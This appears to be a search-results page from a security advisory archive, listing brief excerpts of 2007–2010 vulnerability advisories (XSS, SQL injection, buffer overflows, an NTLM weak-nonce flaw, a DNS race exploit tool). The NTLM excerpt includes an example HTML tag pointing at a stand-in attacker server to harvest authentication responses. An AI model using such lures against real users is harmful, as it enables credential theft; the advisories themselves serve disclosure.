multiplication

[DSECRG-09-013] IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities

Application:                IBM WebSphere Application Server
Versions Affected:          7.0 and 6.1
Vendor URL:                 http://www.ibm.com/websphere/
Bug:                        Multiple XSS Vulnerabilities
Exploits:                   YES
Reported:                   01.11.2008
Vendor response:            02.11.2008    
Solution:                   FP 6.1.0.23 and 7.0.0.3   
Date of Public Advisory:    27.03.2009

iScripts SocialWare 2.2.x Multiple Remote Vulnerability

iScripts SocialWare 2.2.x Multiple Remote Vulnerability

 Name              iScripts SocialWare
 Vendor            http://www.iscripts.com
 Versions Affected 2.2.x

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-03-07

Vtiger CRM 5.0.4 Multiple Vulnerabilities

Vtiger CRM 5.0.4 Multiple Vulnerabilities

 Name              Multiple Vulnerabilities in Vtiger CRM
 Systems Affected  Vtiger CRM 5.0.4 and possibly earlier versions
 Severity          Medium
 Impact (CVSSv2)   Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
 Vendor            http://www.vtigercrm.com
 Advisory          http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt
 Authors           Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)

[ GLSA 200804-20 ] Sun JDK/JRE: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Sun JDK/JRE: Multiple vulnerabilities
      Date: April 17, 2008
      Bugs: #178851, #178962, #183580, #185256, #194711, #212425
        ID: 200804-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

Application:                    Dokeos E-Learning System        
Versions Affected:              1.8.4
Vendor URL:                     http://dokeos.com
Bugs:                           Multiple SQL Injections, Multiple Blind SQL Injections, Multiple XSS, etc.
Exploits:                       YES
Reported:                       25.01.2008
Vendor response:                28.01.2008
Patch released:                 12.02.2008    
Date of Public Advisory:        19.02.2008

VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components

- -----------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2009-0016
Synopsis:          VMware vCenter and ESX update release and vMA patch
                   release address multiple security issue in third
                   party components
Issue date:        2009-11-20
Updated on:        2009-11-20 (initial release of advisory)
CVE numbers:       --- JRE ---
                   CVE-2009-1093 CVE-2009-1094 CVE-2009-1095

Family Connections <= 2.1.3 Multiple Remote Vulnerabilities

Family Connections <= 2.1.3 Multiple Remote Vulnerabilities

 Name              Family Connections
 Vendor            http://www.familycms.com
 Versions Affected <= 2.1.3

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-16

multiple CAPTCHA automation test bypass digest

Dear bugtraq,

  Below  is a digest of vulnerabilities in multiple CAPTCHA systems. All
  vulnerabilities  were reported by MustLive (websecurity.com.ua) during
  "The Month of Bugs in CAPTCHA"

1. Peter’s Custom Anti-Spam Image < 2.9 (Wordpress plugin)

   1.1 "antiselect" value can be guessed with 10% probability.
   1.2 Same check pairs may be used for multiple postings

[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities

Description
***********

Blogcms system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS


[ MDVSA-2009:311 ] ghostscript

 attackers to cause denial of service and possibly to execute arbitrary
 code by using a crafted PDF file (CVE-2009-0196).
 
 Multiple integer overflows in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via a crafted
 image file, related to integer multiplication for memory allocation
 (CVE-2008-3520).
 
 Buffer overflow in the jas_stream_printf function in
 libjasper/base/jas_stream.c in JasPer 1.900.1 might allow
 context-dependent attackers to have an unknown impact via

[SECURITY] [DSA 1903-1] New graphicsmagick packages fix several vulnerabilities

The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2007-1667

  Multiple integer overflows in XInitImage function in xwd.c for
  GraphicsMagick, allow user-assisted remote attackers to cause a
  denial of service (crash) or obtain sensitive information via
  crafted images with large or negative values that trigger a
  buffer overflow. It only affects the oldstable distribution (etch).


AdaptBB 1.0 Beta Multiple Remote Vulnerabilities

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/

[+] Bugs: [A] Multiple Blind SQL Injection
          [B] Multiple Dynamic Code Execution
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted TCP Sequence Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS Software Multiple Features Crafted
TCP Sequence Vulnerability

Advisory ID: cisco-sa-20090325-tcp

http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml


Advisory SE-2008-02: PHP GENERATE_SEED() Weak Random Number Seed Vulnerability

   zero factor problem
   -------------------
   When you have a look on the code generated by the compiler you will
   see that it first multiplies the timestamp, process identifier and
   the numerical factor. This is performed in modular integer arithmetic. 
   It was therefore evaluated how likely it is that the multiplication 
   will result in a zero, because then the seed will be zero, too.
   (on older PHP versions the seed will be 1 for mt_rand() because the
    lowest bit will be forced to be 1)

   1000000 is a number with its lowest 6 bits set to zero. Therefore

[ GLSA 200807-16 ] Python: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Python: Multiple vulnerabilities
      Date: July 31, 2008
      Bugs: #230640, #232137
        ID: 200807-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

DNS Multiple Race Exploiting Tool

#################################################################################
Subject:        DNS Multiple Race Exploiting Tool release
Homepage:       http://www.securebits.org/dnsmre.html
Download:       http://www.securebits.org/tools/dns_mre-v1.0.tar.gz
OS:             The tool runs on Linux
Target OS:      Tested against windows 2003 server
#################################################################################


[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS

Application:                    Quate CMS
Versions Affected:              0.3.4
Vendor URL:                     http://www.quate.net/
Bugs:                           RFI, Multiple LFI, Directory traversal, Multiple XSS
Exploits:                       YES
Reported:                       18.03.2008
Second report:                  25.03.2008
Vendor response:                NONE
Solution:                       NONE    

EEYE: Multiple Vulnerabilities In .FLAC File Format and Various Media Applications

Multiple Vulnerabilities In .FLAC File Format and Various Media
Applications

Release Date:
November 15, 2007

Date Reported:
September 28, 2007 (Vendor Reporting Coordination Began With US-CERT)

Severity:

[ GLSA 200711-30 ] PCRE: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: PCRE: Multiple vulnerabilities
      Date: November 20, 2007
      Bugs: #198198
        ID: 200711-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Simple PHP Blog Multiple Vulnerabilities

Secure Network - Security Research Advisory

Vuln name: Simple PHP Blog Multiple Vulnerabilities
Systems affected: simplePHPBlog 0.5.0.1, simplePHPBlog 0.4.8 and all previous versions
Systems not affected: -
Severity: Medium
Local/Remote: Remote
Vendor URL: http://www.simplephpblog.com/
Author(s): Luca "ikki" Carettoni - luca.carettoni@securenetwork.it, Luca "Daath" De Fulgentis - daath@webapptest.org
Vendor disclosure: 14th September 2007

SimpGB version 1.46.02 Multiple Path Disclosure Vulnerabilities

        netVigilance Security Advisory #64

SimpGB version 1.46.02 Multiple Path Disclosure Vulnerabilities
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References: 
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received


SimpGB version 1.46.02 Multiple XSS Attack Vulnerabilities

        netVigilance Security Advisory #67

SimpGB version 1.46.02 Multiple XSS Attack Vulnerabilities 
Description:
SimpGB is a guestbook with data stored in MySQL, administration interface and support for multiple languages. Features: Data stored in MySQL, Administration interface, Support for multiple languages, Support for multiple instances in one database, Support for multiple layouts, Own header/footer can be defined, Support of BBCode and smilies, Admin can decide which BBCode tags to enable, Avatars (with option to let users upload their own), Admin can decide which input fields to display and which of them are required, Admins can write comments on posts, Admins can mark entry as "always on top", Admins can attach file to entry, flood protection, IP banlist, bad word list, send email notification upon new posts, optionally validate new posts before they get visible by public, own leadtext for entry form and own "Thank you" message can be defined, Option to mark posts as private (only admins can see them), search entries, Option to let users send emails out of guestbook.
External References: 
Mitre CVE: ID requested but no answer received
NVD NIST: ID requested but no answer received
OSVDB: ID requested but no answer received
BUGTRAQ/BID:  

[CAID 35690, 35691, 35692]: CA BrightStor Hierarchical Storage Manager CsAgent Multiple Vulnerabilities

Title: [CAID 35690, 35691, 35692]: CA BrightStor Hierarchical 
Storage Manager CsAgent Multiple Vulnerabilities

CA Vuln ID (CAID): 35690, 35691, 35692

CA Advisory Date: 2007-09-26

Reported By: Sean Larsson, iDefense Labs
             anonymous researcher working with the iDefense VCP

RE: [ GLSA 201006-13 ] Smarty: Multiple vulnerabilities

From: Alex Legler [mailto:a3li@gentoo.org]
Sent: 02 June 2010 22:18
To: gentoo-announce@gentoo.org
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk;
security-alerts@linuxsecurity.com
Subject: [ GLSA 201006-13 ] Smarty: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201006-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/

iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability

iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability

 Name              iScripts MultiCart
 Vendor            http://www.iscripts.com
 Versions Affected 2.2

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-03-07

[ MDVSA-2010:096 ] tetex

 Affected: Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been discovered and fixed in tetex:
 
 Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2
 and earlier allow remote attackers to cause a denial of service
 (crash) via a crafted PDF file, related to (1) setBitmap and (2)
 readSymbolDictSeg (CVE-2009-0146).

[ MDVSA-2010:087 ] poppler

 Affected: Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in poppler:
 
 Multiple buffer overflows in the JBIG2 decoder in Xpdf 3.02pl2
 and earlier allow remote attackers to cause a denial of service
 (crash) via a crafted PDF file, related to (1) setBitmap and (2)
 readSymbolDictSeg (CVE-2009-0146).

Windows SMB NTLM Authentication Weak Nonce Vulnerability

        (ii) An attacker A connects to system S and sends multiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
web server with similar <IMG> tags. Upon receiving the connections from
system S, the attacker's SMB server will respond with the previously
obtained challenges and will store the corresponding responses returned
by the remote system. Attacker A has now a set of responses which are

[ GLSA 201001-02 ] Adobe Flash Player: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Adobe Flash Player: Multiple vulnerabilities
      Date: January 03, 2010
      Bugs: #296407
        ID: 201001-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

[ GLSA 200912-01 ] OpenSSL: Multiple vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenSSL: Multiple vulnerabilities
      Date: December 01, 2009
      Bugs: #270305, #280591, #292022
        ID: 200912-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.